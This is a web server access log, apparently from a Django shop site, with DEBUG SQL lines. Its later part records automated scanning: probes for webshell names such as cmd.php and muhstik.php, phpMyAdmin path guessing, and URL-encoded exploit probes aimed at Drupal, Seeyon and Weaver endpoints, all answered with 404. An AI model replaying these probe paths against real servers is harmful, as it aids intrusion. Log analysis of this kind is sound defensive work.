HTTP/1.0" 302 0 [04/Jan/2020 01:54:11] "GET /xxgk HTTP/1.0" 301 0 [04/Jan/2020 01:55:35] "GET /static/admin/css/base.css HTTP/1.0" 200 16378 [04/Jan/2020 01:55:35] "GET /static/admin/css/login.css HTTP/1.0" 200 1233 [04/Jan/2020 01:58:16] "GET / HTTP/1.0" 302 0 Not Found: /newslist.asp [04/Jan/2020 02:00:45] "GET /newslist.asp?type=1&id=99000 HTTP/1.0" 404 6367 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 02:00:47] "GET /xyzx/ShowArticle.asp?ArticleID=393 HTTP/1.0" 404 6385 [04/Jan/2020 02:04:53] "GET /static/admin/css/responsive.css HTTP/1.0" 200 17944 [04/Jan/2020 02:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:10:06] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:16:36] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:17:35] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:22:38] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:28:01] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:30:02] "GET /whm-server-status HTTP/1.0" 301 0 [04/Jan/2020 02:36:40] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:41:46] "GET / HTTP/1.0" 302 0 Not Found: /index.asp [04/Jan/2020 02:46:34] "GET /index.asp?T=csmm HTTP/1.0" 404 6345 [04/Jan/2020 02:46:48] "GET / HTTP/1.0" 302 0 Not Found: /jspd/Print.asp [04/Jan/2020 02:51:08] "GET /jspd/Print.asp?ArticleID=272 HTTP/1.0" 404 6367 [04/Jan/2020 02:51:24] "GET /static/admin/css/fonts.css HTTP/1.0" 200 423 [04/Jan/2020 02:51:51] "GET / HTTP/1.0" 302 0 [04/Jan/2020 02:56:54] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:10:05] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:20:10] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:25:13] "GET / HTTP/1.0" 302 0 Not Found: /dtgh/UploadFiles_5967/201702/2017022209520351.jpg [04/Jan/2020 03:29:58] "GET /dtgh/UploadFiles_5967/201702/2017022209520351.jpg HTTP/1.0" 404 6458 [04/Jan/2020 03:30:16] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:31:53] "GET /bmxx HTTP/1.0" 301 0 [04/Jan/2020 03:35:18] "GET / HTTP/1.0" 302 0 Not Found: /bmxx/ShowClass.asp [04/Jan/2020 03:39:56] "GET /bmxx/ShowClass.asp?ClassID=13 HTTP/1.0" 404 6376 Not Found: /newslist.asp [04/Jan/2020 03:39:58] "GET /newslist.asp?type=4&id=1196 HTTP/1.0" 404 6366 Not Found: /xyzx/ShowArticle.asp [04/Jan/2020 03:40:00] "GET /xyzx/ShowArticle.asp?ArticleID=366 HTTP/1.0" 404 6385 [04/Jan/2020 03:40:48] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:45:01] "GET /whm-server-status HTTP/1.0" 301 0 [04/Jan/2020 03:46:34] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:51:36] "GET / HTTP/1.0" 302 0 [04/Jan/2020 03:56:39] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:05:03] "GET / HTTP/1.0" 302 0 Not Found: /xkdh/ShowClass.asp [04/Jan/2020 04:13:11] "GET /xkdh/ShowClass.asp?ClassID=50 HTTP/1.0" 404 6376 Not Found: /newslist.asp [04/Jan/2020 04:13:55] "GET /newslist.asp?type=4&id=1721 HTTP/1.0" 404 6366 [04/Jan/2020 04:14:51] "GET / HTTP/1.0" 302 0 Not Found: /jspd/ShowArticle.asp [04/Jan/2020 04:16:57] "GET /jspd/ShowArticle.asp?ArticleID=71 HTTP/1.0" 404 6384 Not Found: /xsyd/Print.asp [04/Jan/2020 04:17:59] "GET /xsyd/Print.asp?ArticleID=455 HTTP/1.0" 404 6367 [04/Jan/2020 04:19:54] "GET / HTTP/1.0" 302 0 Not Found: /User/User_Favorite.asp [04/Jan/2020 04:23:40] "GET /User/User_Favorite.asp?Action=Add&ChannelID=1004&InfoID=510 HTTP/1.0" 404 6422 [04/Jan/2020 04:24:57] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:30:00] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:38:32] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:48:31] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:53:04] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:53:34] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [04/Jan/2020 04:58:13] "GET /robots.txt HTTP/1.0" 404 6341 Not Found: /xyzx/SendMail.asp [04/Jan/2020 04:58:21] "GET /xyzx/SendMail.asp?ArticleID=417 HTTP/1.0" 404 6376 Not Found: /robots.txt [04/Jan/2020 04:58:27] "GET /robots.txt HTTP/1.0" 404 6354 [04/Jan/2020 04:58:35] "GET / HTTP/1.0" 302 0 [04/Jan/2020 04:58:37] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-04 04:58:43,567 utils 27361 140408453592832 (0.003) SELECT (1) AS "a" FROM "django_session" WHERE "django_session"."session_key" = 'gt0t3x2zcvk5lfxfwkkl18lokfe7kpez' LIMIT 1; args=('gt0t3x2zcvk5lfxfwkkl18lokfe7kpez',) DEBUG 2020-01-04 04:58:43,569 utils 27361 140408453592832 (0.001) INSERT INTO "django_session" ("session_key", "session_data", "expire_date") VALUES ('gt0t3x2zcvk5lfxfwkkl18lokfe7kpez', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', '2020-01-18T04:58:43.568188+00:00'::timestamptz); args=('gt0t3x2zcvk5lfxfwkkl18lokfe7kpez', 'OTJhYzE3OWNiNTVlYTA2YTEwZGFmYTcxYzI2OTRhOTVkMDNhOWJmNDp7ImNhcnQiOnt9fQ==', datetime.datetime(2020, 1, 18, 4, 58, 43, 568188, tzinfo=)) [04/Jan/2020 04:58:43] "GET /login/?next=/ HTTP/1.0" 200 1786 Not Found: /dyzl/ShowArticle.asp [04/Jan/2020 05:03:40] "GET /dyzl/ShowArticle.asp?ArticleID=443 HTTP/1.0" 404 6385 Not Found: /xyzx/Comment.asp [04/Jan/2020 05:03:43] "GET /xyzx/Comment.asp?ArticleID=256 HTTP/1.0" 404 6373 [04/Jan/2020 05:05:02] "GET / HTTP/1.0" 302 0 Not Found: /xyzx/Print.asp [04/Jan/2020 05:08:48] "GET /xyzx/Print.asp?ArticleID=463 HTTP/1.0" 404 6367 [04/Jan/2020 05:10:05] "GET / HTTP/1.0" 302 0 Not Found: /xsyd/Index.asp [04/Jan/2020 05:10:56] "GET /xsyd/Index.asp HTTP/1.0" 404 6353 Not Found: /bmxx/ShowClass.asp [04/Jan/2020 05:13:24] "GET /bmxx/ShowClass.asp?ClassID=16 HTTP/1.0" 404 6376 Not Found: /newslist.asp [04/Jan/2020 05:13:27] "GET /newslist.asp?type=4&id=1391 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 05:13:42] "GET /newslist.asp?type=1&id=30200 HTTP/1.0" 404 6367 [04/Jan/2020 05:15:08] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:25:15] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:31:58] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:39:21] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:44:23] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:53:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 05:58:06] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:03:00] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:05:03] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:10:06] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:15:08] "GET / HTTP/1.0" 302 0 Not Found: /dyzl/ShowClass.asp [04/Jan/2020 06:15:36] "GET /dyzl/ShowClass.asp?ClassID=23 HTTP/1.0" 404 6376 Not Found: /xsyd/SendMail.asp [04/Jan/2020 06:15:40] "GET /xsyd/SendMail.asp?ArticleID=464 HTTP/1.0" 404 6376 Not Found: /newslist.asp [04/Jan/2020 06:16:01] "GET /newslist.asp?type=1&id=60700 HTTP/1.0" 404 6367 Not Found: /xsyd/ShowClass.asp [04/Jan/2020 06:16:58] "GET /xsyd/ShowClass.asp?ClassID=29 HTTP/1.0" 404 6376 Not Found: /xyzx/Comment.asp [04/Jan/2020 06:18:22] "GET /xyzx/Comment.asp?ArticleID=505 HTTP/1.0" 404 6373 Not Found: /xyzx/SendMail.asp [04/Jan/2020 06:18:32] "GET /xyzx/SendMail.asp?ArticleID=246 HTTP/1.0" 404 6376 [04/Jan/2020 06:20:11] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:25:13] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:30:48] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:35:52] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:44:07] "GET / HTTP/1.0" 302 0 [04/Jan/2020 06:50:33] "GET / HTTP/1.0" 302 0 Not Found: /robots.txt [04/Jan/2020 06:50:33] "GET /robots.txt HTTP/1.0" 404 6340 [04/Jan/2020 06:50:38] "GET / HTTP/1.0" 302 0 Not Found: /l.php [04/Jan/2020 06:50:38] "GET /l.php HTTP/1.0" 404 6325 Not Found: /phpinfo.php [04/Jan/2020 06:50:41] "GET /phpinfo.php HTTP/1.0" 404 6343 Not Found: /test.php [04/Jan/2020 06:50:42] "GET /test.php HTTP/1.0" 404 6334 Not Found: /index.php [04/Jan/2020 06:50:44] "POST /index.php HTTP/1.0" 404 6338 Not Found: /bbs.php [04/Jan/2020 06:50:45] "POST /bbs.php HTTP/1.0" 404 6332 [04/Jan/2020 06:51:04] "GET / HTTP/1.0" 302 0 DEBUG 2020-01-04 06:51:13,062 utils 27361 140408453592832 (0.005) SELECT "shop_category"."id", "shop_category"."name", "shop_category"."parent_id", "shop_category"."image", "shop_category"."description", "shop_category"."popular", "shop_category"."slug", "shop_category"."lft", "shop_category"."rght", "shop_category"."tree_id", "shop_category"."level" FROM "shop_category" WHERE "shop_category"."slug" = 'webdav'; args=('webdav',) Not Found: /webdav/ [04/Jan/2020 06:51:13] "GET /webdav/ HTTP/1.0" 404 1728 Not Found: /help-e.php [04/Jan/2020 06:51:45] "GET /help-e.php HTTP/1.0" 404 6340 Not Found: /license.php [04/Jan/2020 06:51:49] "GET /license.php HTTP/1.0" 404 6343 Not Found: /log.php [04/Jan/2020 06:51:53] "GET /log.php HTTP/1.0" 404 6331 Not Found: /hell.php [04/Jan/2020 06:51:57] "GET /hell.php HTTP/1.0" 404 6334 Not Found: /x.php [04/Jan/2020 06:52:05] "GET /x.php HTTP/1.0" 404 6325 Not Found: /shell.php [04/Jan/2020 06:52:09] "GET /shell.php HTTP/1.0" 404 6337 Not Found: /htdocs.php [04/Jan/2020 06:52:13] "GET /htdocs.php HTTP/1.0" 404 6340 Not Found: /b.php [04/Jan/2020 06:52:17] "GET /b.php HTTP/1.0" 404 6325 Not Found: /sane.php [04/Jan/2020 06:52:21] "GET /sane.php HTTP/1.0" 404 6334 Not Found: /desktop.ini.php [04/Jan/2020 06:52:25] "GET /desktop.ini.php HTTP/1.0" 404 6355 Not Found: /z.php [04/Jan/2020 06:52:29] "GET /z.php HTTP/1.0" 404 6325 Not Found: /lala.php [04/Jan/2020 06:52:33] "GET /lala.php HTTP/1.0" 404 6334 Not Found: /lala-dpr.php [04/Jan/2020 06:52:37] "GET /lala-dpr.php HTTP/1.0" 404 6346 Not Found: /wpc.php [04/Jan/2020 06:52:41] "GET /wpc.php HTTP/1.0" 404 6331 Not Found: /wpo.php [04/Jan/2020 06:52:45] "GET /wpo.php HTTP/1.0" 404 6331 Not Found: /t6nv.php [04/Jan/2020 06:52:49] "GET /t6nv.php HTTP/1.0" 404 6334 Not Found: /muhstik.php [04/Jan/2020 06:52:53] "GET /muhstik.php HTTP/1.0" 404 6343 Not Found: /text.php [04/Jan/2020 06:52:57] "GET /text.php HTTP/1.0" 404 6334 Not Found: /muhstik.php [04/Jan/2020 06:53:05] "GET /muhstik.php HTTP/1.0" 404 6343 Not Found: /muhstik2.php [04/Jan/2020 06:53:09] "GET /muhstik2.php HTTP/1.0" 404 6346 Not Found: /muhstiks.php [04/Jan/2020 06:53:13] "GET /muhstiks.php HTTP/1.0" 404 6346 Not Found: /muhstik-dpr.php [04/Jan/2020 06:53:17] "GET /muhstik-dpr.php HTTP/1.0" 404 6355 Not Found: /lol.php [04/Jan/2020 06:53:21] "GET /lol.php HTTP/1.0" 404 6331 Not Found: /uploader.php [04/Jan/2020 06:53:21] "GET /uploader.php HTTP/1.0" 404 6346 Not Found: /cmd.php [04/Jan/2020 06:53:23] "GET /cmd.php HTTP/1.0" 404 6331 Not Found: /cmv.php [04/Jan/2020 06:53:25] "GET /cmv.php HTTP/1.0" 404 6331 Not Found: /cmdd.php [04/Jan/2020 06:53:25] "GET /cmdd.php HTTP/1.0" 404 6334 Not Found: /knal.php [04/Jan/2020 06:53:27] "GET /knal.php HTTP/1.0" 404 6334 Not Found: /cmd.php [04/Jan/2020 06:53:29] "GET /cmd.php HTTP/1.0" 404 6331 Not Found: /appserv.php [04/Jan/2020 06:53:33] "GET /appserv.php HTTP/1.0" 404 6343 Not Found: /scripts/setup.php [04/Jan/2020 06:53:33] "GET /scripts/setup.php HTTP/1.0" 404 6361 Not Found: /phpmyadmin/scripts/setup.php [04/Jan/2020 06:53:34] "GET /phpmyadmin/scripts/setup.php HTTP/1.0" 404 6394 Not Found: /phpMyAdmin/scripts/setup.php [04/Jan/2020 06:53:35] "GET /phpMyAdmin/scripts/setup.php HTTP/1.0" 404 6394 Not Found: /scripts/db___.init.php [04/Jan/2020 06:53:37] "GET /scripts/db___.init.php HTTP/1.0" 404 6376 [04/Jan/2020 06:53:37] "GET / HTTP/1.0" 302 0 Not Found: /phpmyadmin/scripts/db___.init.php [04/Jan/2020 06:53:38] "GET /phpmyadmin/scripts/db___.init.php HTTP/1.0" 404 6409 Not Found: /phpMyAdmin/scripts/db___.init.php [04/Jan/2020 06:53:38] "GET /phpMyAdmin/scripts/db___.init.php HTTP/1.0" 404 6409 Not Found: /pma/scripts/setup.php [04/Jan/2020 06:53:42] "GET /pma/scripts/setup.php HTTP/1.0" 404 6373 Not Found: /PMA/scripts/setup.php [04/Jan/2020 06:53:42] "GET /PMA/scripts/setup.php HTTP/1.0" 404 6373 Not Found: /myadmin/scripts/setup.php [04/Jan/2020 06:53:43] "GET /myadmin/scripts/setup.php HTTP/1.0" 404 6385 Not Found: /MyAdmin/scripts/setup.php [04/Jan/2020 06:53:43] "GET /MyAdmin/scripts/setup.php HTTP/1.0" 404 6385 Not Found: /spider.php [04/Jan/2020 06:55:13] "GET /spider.php HTTP/1.0" 404 6340 [04/Jan/2020 06:55:15] "GET / HTTP/1.0" 302 0 Not Found: /payload.php [04/Jan/2020 06:55:17] "GET /payload.php HTTP/1.0" 404 6343 Not Found: /composers.php [04/Jan/2020 06:55:21] "GET /composers.php HTTP/1.0" 404 6349 Not Found: /izom.php [04/Jan/2020 06:55:25] "GET /izom.php HTTP/1.0" 404 6334 Not Found: /composer.php [04/Jan/2020 06:55:29] "GET /composer.php HTTP/1.0" 404 6346 Not Found: /hue2.php [04/Jan/2020 06:55:33] "GET /hue2.php HTTP/1.0" 404 6334 Not Found: /Drupal.php [04/Jan/2020 06:55:37] "GET /Drupal.php HTTP/1.0" 404 6340 Not Found: /izom.php [04/Jan/2020 06:55:45] "GET /izom.php HTTP/1.0" 404 6334 Not Found: /payload.php [04/Jan/2020 06:55:49] "GET /payload.php HTTP/1.0" 404 6343 Not Found: /new_license.php [04/Jan/2020 06:55:53] "GET /new_license.php HTTP/1.0" 404 6355 Not Found: /images/!.php [04/Jan/2020 06:55:57] "GET /images/!.php HTTP/1.0" 404 6346 Not Found: /hd.php [04/Jan/2020 06:56:05] "GET /hd.php HTTP/1.0" 404 6328 Not Found: /images/up.php [04/Jan/2020 06:56:09] "GET /images/up.php HTTP/1.0" 404 6349 Not Found: /images/attari.php [04/Jan/2020 06:56:13] "GET /images/attari.php HTTP/1.0" 404 6361 Not Found: /images/jsspwneed.php [04/Jan/2020 06:56:17] "GET /images/jsspwneed.php HTTP/1.0" 404 6370 Not Found: /images/stories/cmd.php [04/Jan/2020 06:56:17] "GET /images/stories/cmd.php HTTP/1.0" 404 6376 Not Found: /images/stories/filemga.php [04/Jan/2020 06:56:17] "GET /images/stories/filemga.php?ssp=RfVbHu HTTP/1.0" 404 6399 Not Found: /up.php [04/Jan/2020 06:56:18] "GET /up.php HTTP/1.0" 404 6328 Not Found: /laravel.php [04/Jan/2020 06:56:19] "GET /laravel.php HTTP/1.0" 404 6343 Not Found: /huoshan.php [04/Jan/2020 06:56:21] "GET /huoshan.php HTTP/1.0" 404 6343 Not Found: /yu.php [04/Jan/2020 06:56:22] "GET /yu.php HTTP/1.0" 404 6328 Not Found: /ftmabc.php [04/Jan/2020 06:56:25] "GET /ftmabc.php HTTP/1.0" 404 6340 Not Found: /doudou.php [04/Jan/2020 06:56:26] "GET /doudou.php HTTP/1.0" 404 6340 Not Found: /mjx.php [04/Jan/2020 06:56:26] "GET /mjx.php HTTP/1.0" 404 6331 Not Found: /xiaoxia.php [04/Jan/2020 06:56:27] "GET /xiaoxia.php HTTP/1.0" 404 6343 Not Found: /yuyang.php [04/Jan/2020 06:56:29] "GET /yuyang.php HTTP/1.0" 404 6340 Not Found: /zz.php [04/Jan/2020 06:56:31] "GET /zz.php HTTP/1.0" 404 6328 Not Found: /coonig.php [04/Jan/2020 06:56:33] "GET /coonig.php HTTP/1.0" 404 6340 Not Found: /ak.php [04/Jan/2020 06:56:33] "GET /ak.php HTTP/1.0" 404 6328 Not Found: /baidoubi.php [04/Jan/2020 06:56:33] "GET /baidoubi.php HTTP/1.0" 404 6346 Not Found: /hhhhhh.php [04/Jan/2020 06:56:34] "GET /hhhhhh.php HTTP/1.0" 404 6340 Not Found: /no1.php [04/Jan/2020 06:56:37] "GET /no1.php HTTP/1.0" 404 6331 Not Found: /python.php [04/Jan/2020 06:56:37] "GET /python.php HTTP/1.0" 404 6340 Not Found: /woshimengmei.php [04/Jan/2020 06:56:38] "GET /woshimengmei.php HTTP/1.0" 404 6358 Not Found: /taisui.php [04/Jan/2020 06:56:42] "GET /taisui.php HTTP/1.0" 404 6340 Not Found: /xiaxia.php [04/Jan/2020 06:56:43] "GET /xiaxia.php HTTP/1.0" 404 6340 Not Found: /kk.php [04/Jan/2020 06:56:43] "GET /kk.php HTTP/1.0" 404 6328 Not Found: /xsser.php [04/Jan/2020 06:56:44] "GET /xsser.php HTTP/1.0" 404 6337 Not Found: /s.php [04/Jan/2020 06:58:01] "POST /s.php HTTP/1.0" 404 6326 Not Found: /w.php [04/Jan/2020 06:58:05] "POST /w.php HTTP/1.0" 404 6326 Not Found: /qaq.php [04/Jan/2020 06:58:13] "POST /qaq.php HTTP/1.0" 404 6332 Not Found: /my.php [04/Jan/2020 06:58:17] "POST /my.php HTTP/1.0" 404 6329 Not Found: /qq.php [04/Jan/2020 06:58:21] "POST /qq.php HTTP/1.0" 404 6329 Not Found: /aaa.php [04/Jan/2020 06:58:25] "POST /aaa.php HTTP/1.0" 404 6332 Not Found: /hhh.php [04/Jan/2020 06:58:29] "POST /hhh.php HTTP/1.0" 404 6332 Not Found: /jjj.php [04/Jan/2020 06:58:33] "POST /jjj.php HTTP/1.0" 404 6332 Not Found: /vvv.php [04/Jan/2020 06:58:37] "POST /vvv.php HTTP/1.0" 404 6332 [04/Jan/2020 06:58:40] "GET / HTTP/1.0" 302 0 Not Found: /www.php [04/Jan/2020 06:58:41] "POST /www.php HTTP/1.0" 404 6332 Not Found: /ffr.php [04/Jan/2020 06:58:45] "POST /ffr.php HTTP/1.0" 404 6332 Not Found: /411.php [04/Jan/2020 06:58:49] "POST /411.php HTTP/1.0" 404 6332 Not Found: /415.php [04/Jan/2020 06:58:53] "POST /415.php HTTP/1.0" 404 6332 Not Found: /421.php [04/Jan/2020 06:58:57] "POST /421.php HTTP/1.0" 404 6332 Not Found: /444.php [04/Jan/2020 06:59:01] "POST /444.php HTTP/1.0" 404 6332 Not Found: /a411.php [04/Jan/2020 06:59:01] "POST /a411.php HTTP/1.0" 404 6335 Not Found: /whoami.php [04/Jan/2020 06:59:03] "POST /whoami.php HTTP/1.0" 404 6341 Not Found: /whoami.php.php [04/Jan/2020 06:59:05] "POST /whoami.php.php HTTP/1.0" 404 6353 Not Found: /9.php [04/Jan/2020 06:59:05] "POST /9.php HTTP/1.0" 404 6326 Not Found: /98k.php [04/Jan/2020 06:59:05] "POST /98k.php HTTP/1.0" 404 6332 Not Found: /981.php [04/Jan/2020 06:59:08] "POST /981.php HTTP/1.0" 404 6332 Not Found: /887.php [04/Jan/2020 06:59:09] "POST /887.php HTTP/1.0" 404 6332 Not Found: /aa.php [04/Jan/2020 06:59:14] "POST /aa.php HTTP/1.0" 404 6329 Not Found: /bb.php [04/Jan/2020 06:59:15] "POST /bb.php HTTP/1.0" 404 6329 Not Found: /pp.php [04/Jan/2020 06:59:17] "POST /pp.php HTTP/1.0" 404 6329 Not Found: /tt.php [04/Jan/2020 06:59:17] "POST /tt.php HTTP/1.0" 404 6329 Not Found: /bbq.php [04/Jan/2020 06:59:18] "POST /bbq.php HTTP/1.0" 404 6332 Not Found: /jj1.php [04/Jan/2020 06:59:20] "POST /jj1.php HTTP/1.0" 404 6332 Not Found: /jbb.php [04/Jan/2020 06:59:21] "POST /jbb.php HTTP/1.0" 404 6332 Not Found: /7o.php [04/Jan/2020 06:59:22] "POST /7o.php HTTP/1.0" 404 6329 Not Found: /seeyon/htmlofficeservlet [04/Jan/2020 06:59:26] "GET /%73%65%65%79%6F%6E/%68%74%6D%6C%6F%66%66%69%63%65%73%65%72%76%6C%65%74 HTTP/1.0" 404 6382 Not Found: /weaver/bsh.servlet.BshServlet [04/Jan/2020 06:59:30] "GET /weaver/bsh.servlet.BshServlet HTTP/1.0" 404 6397 Not Found: /index.php [04/Jan/2020 06:59:34] "POST /index.php HTTP/1.0" 404 6338 Not Found: /user/register [04/Jan/2020 06:59:34] "POST /%75%73%65%72/%72%65%67%69%73%74%65%72?%65%6c%65%6d%65%6e%74%5f%70%61%72%65%6e%74%73=%74%69%6d%65%7a%6f%6e%65%2f%74%69%6d%65%7a%6f%6e%65%2f%23%76%61%6c%75%65&%61%6a%61%78%5f%66%6f%72%6d=1&%5f%77%72%61%70%70%65%72%5f%66%6f%72%6d%61%74=%64%72%75%70%61%6c%5f%61%6a%61%78 HTTP/1.0" 404 6587 [04/Jan/2020 06:59:36] "GET / HTTP/1.0" 302 0 Not Found: /user.php [04/Jan/2020 06:59:37] "POST /%75%73%65%72%2e%70%68%70 HTTP/1.0" 404 6335 Not Found: /index.php [04/Jan/2020 06:59:37] "GET /index.php HTTP/1.0" 404 6337 Not Found: /phpmyadmin/index.php [04/Jan/2020 06:59:39] "GET /phpmyadmin/index.php HTTP/1.0" 404 6370 Not Found: /pmd/index.php [04/Jan/2020 06:59:42] "GET /pmd/index.php HTTP/1.0" 404 6349 Not Found: /pma/index.php [04/Jan/2020 06:59:42] "GET /pma/index.php HTTP/1.0" 404 6349 Not Found: /PMA/index.php [04/Jan/2020 06:59:43] "GET /PMA/index.php HTTP/1.0" 404 6349 Not Found: /PMA2/index.php [04/Jan/2020 06:59:43] "GET /PMA2/index.php HTTP/1.0" 404 6352 Not Found: /pmamy/index.php [04/Jan/2020 06:59:44] "GET /pmamy/index.php HTTP/1.0" 404 6355 Not Found: /pmamy2/index.php [04/Jan/2020 06:59:45] "GET /pmamy2/index.php HTTP/1.0" 404 6358 Not Found: /newslist.asp [04/Jan/2020 07:00:34] "GET /newslist.asp?type=4&id=1716 HTTP/1.0" 404 6366 Not Found: /newslist.asp [04/Jan/2020 07:00:42] "GET /newslist.asp?type=1&id=70000 HTTP/1.0" 404 6367 Not Found: /phpmyadmin1/index.php [04/Jan/2020 07:01:01] "GET /phpmyadmin1/index.php HTTP/1.0" 404 6373 Not Found: /phpMyAdmin-4.4.0/index.php [04/Jan/2020 07:01:09] "GET /phpMyAdmin-4.4.0/index.php HTTP/1.0" 404 6388 Not Found: /phpMyAdmin4.8.0/index.php [04/Jan/2020 07:01:13] "GET /phpMyAdmin4.8.0/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.1/index.php [04/Jan/2020 07:01:17] "GET /phpMyAdmin4.8.1/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.2/index.php [04/Jan/2020 07:01:21] "GET /phpMyAdmin4.8.2/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.3/index.php [04/Jan/2020 07:01:25] "GET /phpMyAdmin4.8.3/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.4/index.php [04/Jan/2020 07:01:29] "GET /phpMyAdmin4.8.4/index.php HTTP/1.0" 404 6385 Not Found: /phpMyAdmin4.8.5/index.php [04/Jan/2020 07:01:33] "GET /phpMyAdmin4.8.5/index.php HTTP/1.0" 404 6385 Not Found: /myadmin/index.php [04/Jan/2020 07:01:37] "GET /myadmin/index.php HTTP/1.0" 404 6361 Not Found: /myadmin2/index.php [04/Jan/2020 07:01:41] "GET /myadmin2/index.php HTTP/1.0" 404 6364 Not Found: /phpMyadmin_bak/index.php [04/Jan/2020 07:01:49] "GET /phpMyadmin_bak/index.php HTTP/1.0" 404 6382 Not Found: /tools/phpMyAdmin/index.php [04/Jan/2020 07:01:57] "GET /tools/phpMyAdmin/index.php HTTP/1.0" 404 6388 Not Found: /phpmyadmin-old/index.php [04/Jan/2020 07:02:01] "GET /phpmyadmin-old/index.php HTTP/1.0" 404 6382 Not Found: /phpMyAdminold/index.php [04/Jan/2020 07:02:05] "GET /phpMyAdminold/index.php HTTP/1.0" 404 6379 Not Found: /phpMyAdmin.old/index.php [04/Jan/2020 07:02:09] "GET /phpMyAdmin.old/index.php HTTP/1.0" 404 6382 Not Found: /pma-old/index.php [04/Jan/2020 07:02:13] "GET /pma-old/index.php HTTP/1.0" 404 6361 Not Found: /claroline/phpMyAdmin/index.php [04/Jan/2020 07:02:17] "GET /claroline/phpMyAdmin/index.php HTTP/1.0" 404 6400 Not Found: /typo3/phpmyadmin/index.php [04/Jan/2020 07:02:21] "GET /typo3/phpmyadmin/index.php HTTP/1.0" 404 6388 Not Found: /phpma/index.php [04/Jan/2020 07:02:25] "GET /phpma/index.php HTTP/1.0" 404 6355 Not Found: /phpMyAdmin/phpMyAdmin/index.php [04/Jan/2020 07:02:29] "GET /phpMyAdmin/phpMyAdmin/index.php HTTP/1.0" 404 6403 Not Found: /phpMyAbmin/index.php [04/Jan/2020 07:02:30] "GET /phpMyAbmin/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdmin__/index.php [04/Jan/2020 07:02:34] "GET /phpMyAdmin__/index.php HTTP/1.0" 404 6376 Not Found: /phpMyAdmin+++---/index.php [04/Jan/2020 07:02:34] "GET /phpMyAdmin+++---/index.php HTTP/1.0" 404 6388 Not Found: /phpmyadm1n/index.php [04/Jan/2020 07:02:38] "GET /phpmyadm1n/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdm1n/index.php [04/Jan/2020 07:02:38] "GET /phpMyAdm1n/index.php HTTP/1.0" 404 6370 Not Found: /phpMyadmi/index.php [04/Jan/2020 07:02:41] "GET /phpMyadmi/index.php HTTP/1.0" 404 6367 Not Found: /phpMyAdmion/index.php [04/Jan/2020 07:02:42] "GET /phpMyAdmion/index.php HTTP/1.0" 404 6373 Not Found: /phpmyadmin2222/index.php [04/Jan/2020 07:03:25] "GET /phpmyadmin2222/index.php HTTP/1.0" 404 6382 Not Found: /php2MyAdmin/index.php [04/Jan/2020 07:03:37] "GET /php2MyAdmin/index.php HTTP/1.0" 404 6373 Not Found: /phpiMyAdmin/index.php [04/Jan/2020 07:03:41] "GET /phpiMyAdmin/index.php HTTP/1.0" 404 6373 Not Found: /phpmadmin/index.php [04/Jan/2020 07:04:01] "GET /phpmadmin/index.php HTTP/1.0" 404 6367 Not Found: /321/index.php [04/Jan/2020 07:04:05] "GET /321/index.php HTTP/1.0" 404 6349 Not Found: /123131/index.php [04/Jan/2020 07:04:09] "GET /123131/index.php HTTP/1.0" 404 6358 Not Found: /phpMyAdminn/index.php [04/Jan/2020 07:04:13] "GET /phpMyAdminn/index.php HTTP/1.0" 404 6373 Not Found: /phpMyAdminhf/index.php [04/Jan/2020 07:04:17] "GET /phpMyAdminhf/index.php HTTP/1.0" 404 6376 Not Found: /WWW/phpMyAdmin/index.php [04/Jan/2020 07:04:25] "GET /WWW/phpMyAdmin/index.php HTTP/1.0" 404 6382 Not Found: /phpMyAdmln/index.php [04/Jan/2020 07:04:29] "GET /phpMyAdmln/index.php HTTP/1.0" 404 6370 Not Found: /phpMyAdmin_ai/index.php [04/Jan/2020 07:04:33] "GET /phpMyAdmin_ai/index.php HTTP/1.0" 404 6379 Not Found: /__phpMyAdmin/index.php [04/Jan/2020 07:04:37] "GET /__phpMyAdmin/index.php HTTP/1.0" 404 6376 Not Found: /shopdb/index.php [04/Jan/2020 07:04:45] "GET /shopdb/index.php HTTP/1.0" 404 6358 Not Found: 